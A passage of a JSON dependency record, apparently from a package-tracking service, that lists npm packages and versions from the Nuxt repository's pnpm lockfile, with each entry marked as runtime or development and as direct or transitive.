se},{"id":13870349272,"package_name":"vue","ecosystem":"npm","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"pnpm-lock.yaml","sha":null,"kind":"lockfile","created_at":"2023-09-22T09:09:05.118Z","updated_at":"2023-09-22T09:09:05.118Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/pnpm-lock.yaml","dependencies":[{"id":13870349304,"package_name":"@aashutoshrathi","ecosystem":"npm","requirements":"word-wrap@1.2.6","direct":false,"kind":"runtime","optional":false},{"id":13870349305,"package_name":"@ampproject","ecosystem":"npm","requirements":"remapping@2.2.1","direct":false,"kind":"runtime","optional":false},{"id":13870349306,"package_name":"@babel","ecosystem":"npm","requirements":"code-frame@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349307,"package_name":"@babel","ecosystem":"npm","requirements":"compat-data@7.22.9","direct":false,"kind":"runtime","optional":false},{"id":13870349308,"package_name":"@babel","ecosystem":"npm","requirements":"core@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349309,"package_name":"@babel","ecosystem":"npm","requirements":"generator@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349310,"package_name":"@babel","ecosystem":"npm","requirements":"helper-annotate-as-pure@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349311,"package_name":"@babel","ecosystem":"npm","requirements":"helper-compilation-targets@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349312,"package_name":"@babel","ecosystem":"npm","requirements":"helper-create-class-features-plugin@7.22.10(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349313,"package_name":"@babel","ecosystem":"npm","requirements":"helper-environment-visitor@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349314,"package_name":"@babel","ecosystem":"npm","requirements":"helper-function-name@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349315,"package_name":"@babel","ecosystem":"npm","requirements":"helper-hoist-variables@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349316,"package_name":"@babel","ecosystem":"npm","requirements":"helper-member-expression-to-functions@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349317,"package_name":"@babel","ecosystem":"npm","requirements":"helper-module-imports@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349318,"package_name":"@babel","ecosystem":"npm","requirements":"helper-module-transforms@7.22.9(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349319,"package_name":"@babel","ecosystem":"npm","requirements":"helper-optimise-call-expression@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349320,"package_name":"@babel","ecosystem":"npm","requirements":"helper-plugin-utils@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349321,"package_name":"@babel","ecosystem":"npm","requirements":"helper-replace-supers@7.22.9(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349322,"package_name":"@babel","ecosystem":"npm","requirements":"helper-simple-access@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349323,"package_name":"@babel","ecosystem":"npm","requirements":"helper-skip-transparent-expression-wrappers@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349324,"package_name":"@babel","ecosystem":"npm","requirements":"helper-split-export-declaration@7.22.6","direct":false,"kind":"runtime","optional":false},{"id":13870349325,"package_name":"@babel","ecosystem":"npm","requirements":"helper-string-parser@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349326,"package_name":"@babel","ecosystem":"npm","requirements":"helper-validator-identifier@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349327,"package_name":"@babel","ecosystem":"npm","requirements":"helper-validator-option@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349328,"package_name":"@babel","ecosystem":"npm","requirements":"helpers@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349329,"package_name":"@babel","ecosystem":"npm","requirements":"highlight@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349330,"package_name":"@babel","ecosystem":"npm","requirements":"parser@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349331,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-async-generators@7.8.4(@babel","direct":false,"kind":"development","optional":false},{"id":13870349332,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-bigint@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349333,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-class-properties@7.12.13(@babel","direct":false,"kind":"development","optional":false},{"id":13870349334,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-import-meta@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":13870349335,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-json-strings@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349336,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-jsx@7.22.5(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349337,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-logical-assignment-operators@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":13870349338,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-nullish-coalescing-operator@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349339,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-numeric-separator@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":13870349340,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-object-rest-spread@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349341,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-optional-catch-binding@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349342,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-optional-chaining@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":13870349343,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-top-level-await@7.14.5(@babel","direct":false,"kind":"development","optional":false},{"id":13870349344,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-typescript@7.22.5(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349345,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-typescript@7.22.10(@babel","direct":false,"kind":"runtime","optional":false},{"id":13870349346,"package_name":"@babel","ecosystem":"npm","requirements":"standalone@7.22.9","direct":false,"kind":"runtime","optional":false},{"id":13870349347,"package_name":"@babel","ecosystem":"npm","requirements":"template@7.22.5","direct":false,"kind":"runtime","optional":false},{"id":13870349348,"package_name":"@babel","ecosystem":"npm","requirements":"traverse@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349349,"package_name":"@babel","ecosystem":"npm","requirements":"types@7.22.10","direct":false,"kind":"runtime","optional":false},{"id":13870349350,"package_name":"@cloudflare","ecosystem":"npm","requirements":"kv-asset-handler@0.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349351,"package_name":"@csstools","ecosystem":"npm","requirements":"cascade-layer-name-parser@1.0.4(@csstools","direct":false,"kind":"development","optional":false},{"id":13870349352,"package_name":"@csstools","ecosystem":"npm","requirements":"css-parser-algorithms@2.3.1(@csstools","direct":false,"kind":"development","optional":false},{"id":13870349353,"package_name":"@csstools","ecosystem":"npm","requirements":"css-tokenizer@2.2.0","direct":false,"kind":"development","optional":false},{"id":13870349354,"package_name":"@discoveryjs","ecosystem":"npm","requirements":"json-ext@0.5.7","direct":false,"kind":"runtime","optional":false},{"id":13870349355,"package_name":"@es-joy","ecosystem":"npm","requirements":"jsdoccomment@0.37.1","direct":false,"kind":"development","optional":false},{"id":13870349356,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349357,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349358,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349359,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349360,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349361,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349362,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349363,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349364,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349365,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349366,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349367,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349368,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349369,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349370,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349371,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349372,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349373,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349374,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349375,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349376,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349377,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349378,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349379,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349380,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349381,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349382,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349383,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349384,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349385,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349386,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349387,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349388,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349389,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349390,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349391,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349392,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349393,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349394,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349395,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349396,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349397,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349398,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349399,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349400,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349401,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349402,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349403,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349404,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349405,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349406,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349407,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349408,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349409,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349410,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349411,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349412,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349413,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349414,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349415,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349416,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349417,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349418,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349419,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.17.19","direct":false,"kind":"development","optional":false},{"id":13870349420,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.18.20","direct":false,"kind":"runtime","optional":false},{"id":13870349421,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.19.3","direct":false,"kind":"runtime","optional":false},{"id":13870349422,"package_name":"@eslint-community","ecosystem":"npm","requirements":"eslint-utils@4.4.0(eslint@8.49.0)","direct":false,"kind":"runtime","optional":false},{"id":13870349423,"package_name":"@eslint-community","ecosystem":"npm","requirements":"regexpp@4.6.2","direct":false,"kind":"runtime","optional":false},{"id":13870349424,"package_name":"@eslint","ecosystem":"npm","requirements":"eslintrc@2.1.2","direct":false,"kind":"runtime","optional":false},{"id":13870349425,"package_name":"@eslint","ecosystem":"npm","requirements":"js@8.49.0","direct":false,"kind":"runtime","optional":false},{"id":13870349426,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"config-array@0.11.11","direct":false,"kind":"runtime","optional":false},{"id":13870349427,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"module-importer@1.0.1","direct":false,"kind":"runtime","optional":false},{"id":13870349428,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"object-schema@1.2.1","direct":false,"kind":"runtime","optional":false},{"id":13870349429,"package_name":"@iconify","ecosystem":"npm","requirements":"types@2.0.0","direct":false,"kind":"development","optional":false},{"id":13870349430,"package_name":"@iconify","ecosystem":"npm","requirements":"vue@4.1.1(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349431,"package_name":"@ioredis","ecosystem":"npm","requirements":"commands@1.2.0","direct":false,"kind":"runtime","optional":false},{"id":13870349432,"package_name":"@isaacs","ecosystem":"npm","requirements":"cliui@8.0.2","direct":false,"kind":"development","optional":false},{"id":13870349433,"package_name":"@istanbuljs","ecosystem":"npm","requirements":"load-nyc-config@1.1.0","direct":false,"kind":"development","optional":false},{"id":13870349434,"package_name":"@istanbuljs","ecosystem":"npm","requirements":"schema@0.1.3","direct":false,"kind":"development","optional":false},{"id":13870349435,"package_name":"@jest","ecosystem":"npm","requirements":"environment@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349436,"package_name":"@jest","ecosystem":"npm","requirements":"expect-utils@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349437,"package_name":"@jest","ecosystem":"npm","requirements":"expect@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349438,"package_name":"@jest","ecosystem":"npm","requirements":"fake-timers@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349439,"package_name":"@jest","ecosystem":"npm","requirements":"globals@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349440,"package_name":"@jest","ecosystem":"npm","requirements":"schemas@29.6.3","direct":false,"kind":"runtime","optional":false},{"id":13870349441,"package_name":"@jest","ecosystem":"npm","requirements":"transform@29.7.0","direct":false,"kind":"development","optional":false},{"id":13870349442,"package_name":"@jest","ecosystem":"npm","requirements":"types@29.6.3","direct":false,"kind":"runtime","optional":false},{"id":13870349443,"package_name":"@jridgewell","ecosystem":"npm","requirements":"gen-mapping@0.3.3","direct":false,"kind":"runtime","optional":false},{"id":13870349444,"package_name":"@jridgewell","ecosystem":"npm","requirements":"resolve-uri@3.1.0","direct":false,"kind":"runtime","optional":false},{"id":13870349445,"package_name":"@jridgewell","ecosystem":"npm","requirements":"set-array@1.1.2","direct":false,"kind":"runtime","optional":false},{"id":13870349446,"package_name":"@jridgewell","ecosystem":"npm","requirements":"source-map@0.3.5","direct":false,"kind":"runtime","optional":false},{"id":13870349447,"package_name":"@jridgewell","ecosystem":"npm","requirements":"sourcemap-codec@1.4.14","direct":false,"kind":"runtime","optional":false},{"id":13870349448,"package_name":"@jridgewell","ecosystem":"npm","requirements":"sourcemap-codec@1.4.15","direct":false,"kind":"runtime","optional":false},{"id":13870349449,"package_name":"@jridgewell","ecosystem":"npm","requirements":"trace-mapping@0.3.18","direct":false,"kind":"runtime","optional":false},{"id":13870349450,"package_name":"@mapbox","ecosystem":"npm","requirements":"node-pre-gyp@1.0.11","direct":false,"kind":"runtime","optional":false},{"id":13870349451,"package_name":"@netlify","ecosystem":"npm","requirements":"functions@2.0.2","direct":false,"kind":"runtime","optional":false},{"id":13870349452,"package_name":"@netlify","ecosystem":"npm","requirements":"node-cookies@0.1.0","direct":false,"kind":"runtime","optional":false},{"id":13870349453,"package_name":"@netlify","ecosystem":"npm","requirements":"serverless-functions-api@1.7.3","direct":false,"kind":"runtime","optional":false},{"id":13870349454,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.scandir@2.1.5","direct":false,"kind":"runtime","optional":false},{"id":13870349455,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.stat@2.0.5","direct":false,"kind":"runtime","optional":false},{"id":13870349456,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.walk@1.2.8","direct":false,"kind":"runtime","optional":false},{"id":13870349457,"package_name":"@nuxt-themes","ecosystem":"npm","requirements":"docus@1.14.6(nuxt@packages+nuxt)(postcss@8.4.30)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349458,"package_name":"@nuxt-themes","ecosystem":"npm","requirements":"elements@0.9.4(postcss@8.4.30)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349459,"package_name":"@nuxt-themes","ecosystem":"npm","requirements":"tokens@1.9.1(postcss@8.4.30)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349460,"package_name":"@nuxt-themes","ecosystem":"npm","requirements":"typography@0.11.0(postcss@8.4.30)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":13870349461,"package_name":"@nuxt","ecosystem":"npm","requirements":"content@2.7.2","direct":false,"kind":"development","optional":false},{"id":13870349462,"package_name":"@nuxt","ecosystem":"npm","requirements":"devalue@2.0.2","direct":false,"kind":"runtime","optional":false},{"id":13870349463,"package_name":"@nuxt","ecosystem":"npm","requirements":"friendly-errors-webpack-plugin@2.5.2(webpack@5.88.2)","direct":false,"kind":"runtime","optional":false},{"id":13870349464,"package_name":"@nuxt","ecosystem":"npm","requirements":"telemetry@2.5.0","direct":false,"kind":"runtime","optional":false},{"id":13870349465,"package_name":"@nuxt","ecosystem":"npm","requirements":"ui-templates@1.3.1","direct":false,"kind":"runtime","optional":false},{"id":13870349466,"package_name":"@nuxthq","ecosystem":"npm","requirements":"studio@0.13.4","direct":false,"kind":"development","optional":false},{"id":13870349467,"package_name":"@nuxtjs","ecosystem":"npm","requirements":"color-mode@3.3.0","direct":false,"kind":"development","optional":false},{"id":13870349468,"package_name":"@nuxtjs","ecosystem":"npm","requirements":"eslint-config-typescript@12.1.0(eslint@8.49.0)(typescript@5.2.2)","direct":false,"kind":"development","optional":false},{"id":13870349469,"package_name":"@nuxtjs","ecosystem":"npm","requirements":"eslint-config@12.0.0(@typescript-eslint","direct":false,"kind":"development","optional":false},{"id":13870349470,"package_name":"@one-ini","ecosystem":"npm","requirements":"wasm@0.1.1","direct":false,"kind":"development","optional":false},{"id":13870349471,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-android-arm64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349472,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-darwin-arm64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349473,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-darwin-x64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349474,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-freebsd-x64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349475,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-linux-arm-glibc@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349476,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-linux-arm64-glibc@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349477,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-linux-arm64-musl@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349478,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-linux-x64-glibc@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349479,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-linux-x64-musl@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349480,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-wasm@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349481,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-win32-arm64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349482,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-win32-ia32@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349483,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher-win32-x64@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349484,"package_name":"@parcel","ecosystem":"npm","requirements":"watcher@2.3.0","direct":false,"kind":"runtime","optional":false},{"id":13870349485,"package_name":"@pkgjs","ecosystem":"npm","requirements":"parseargs@0.11.0","direct":false,"kind":"development","optional":false},{"id":13870349486,"package_name":"@polka","ecosystem":"npm","requirements":"url@1.0.0-next.21","direct":false,"kind":"runtime","optional":false},{"id":13870349487,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-alias@5.0.0(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349488,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-commonjs@24.1.0(rollup@3.29.1)","direct":false,"kind":"development","optional":false},{"id":13870349489,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-commonjs@25.0.4(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349490,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-inject@5.0.3(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349491,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-json@6.0.0(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349492,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-node-resolve@15.2.1(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349493,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-replace@5.0.2(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349494,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-terser@0.4.3(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349495,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-wasm@6.1.3(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349496,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@4.2.1","direct":false,"kind":"runtime","optional":false},{"id":13870349497,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@5.0.4(rollup@3.29.1)","direct":false,"kind":"runtime","optional":false},{"id":13870349498,"package_name":"@sinclair","ecosystem":"npm","requirements":"typebox@0.27.8","direct":false,"kind":"runtime","optional":false},{"id":13870349499,"package_name":"@sinonjs","ecosystem":"npm","requirements":"commons@3.0.0","direct":false,"kind":"development","optional":false},{"id":13870349500,"package_name":"@sinonjs","ecosystem":"npm","requirements":"fake-timers@10.3.0","direct":false,"kind":"development","optional":false},{"id":13870349501,"package_name":"@socket.io","ecosystem":"npm","requirements":"component-emitter@3.1.0","direct":false,"kind":"development","optional":false},{"id":13870349502,"package_name":"@trysound","ecosystem":"npm","requirements":"sax@0.2.0","direct":false,"kind":"runtime","optional":false},{"id":13870349503,"package_name":"@types","ecosystem":"npm","requirements":"chai-subset@1.3.3","direct":false,"kind":"development","optional":false},{"id":13870349504,"package_name":"@types","ecosystem":"npm","requirements":"chai@4.3.5","direct":false,"kind":"development","optional":false},{"id":13870349505,"package_name":"@types","ecosystem":"npm","requirements":"clear@0.1.2","direct":false,"kind":"development","optional":false},{"id":13870349506,"package_name":"@types","ecosystem":"npm","requirements":"connect@3.4.35","direct":false,"kind":"development","optional":false},{"id":13870349507,"package_name":"@types","ecosystem":"npm","requirements":"debug@4.1.8","direct":false,"kind":"development","optional":false},{"id":13870349508,"package_name":"@types","ecosystem":"npm","requirements":"eslint-scope@3.7.4","direct":false,"kind":"runtime","optional":false},{"id":13870349509,"package_name":"@types","ecosystem":"npm","requirements":"eslint@8.44.2","direct":false,"kind":"runtime","optional":false},{"id":13870349510,"package_name":"@types","ecosystem":"npm","requirements":"estree@1.0.1","direct":false,"kind":"runtime","optional":false},{"id":13870349511,"package_name":"@types","ecosystem":"npm","requirements":"file-loader@5.0.2","direct":false,"kind":"development","optional":false},{"id":13870349512,"package_name":"@types","ecosystem":"npm","requirements":"fs-extra@11.0.2","direct":false,"kind":"development","optional":false},{"id":13870349513,"package_name":"@types","ecosystem":"npm","requirements":"graceful-fs@4.1.6","direct":false,"kind":"development","optional":false},{"id":13870349514,"package_name":"@types","ecosystem":"npm","requirements":"hash-sum@1.0.0","direct":false,"kind":"development","optional":false},{"id":13870349515,"package_name":"@types","ecosystem":"npm","requirements":"hast@2.3.5","direct":false,"kind":"development","optional":false},{"id":13870349516,"package_name":"@types","ecosystem":"npm","requirements":"http-proxy@1.17.11","direct":false,"kind":"runtime","optional":false},{"id":13870349517,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-lib-coverage@2.0.4","direct":false,"kind":"runtime","optional":false},{"id":13870349518,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-lib-report@3.0.0","direct":false,"kind":"runtime","optional":false},{"id":13870349519,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-reports@3.0.1",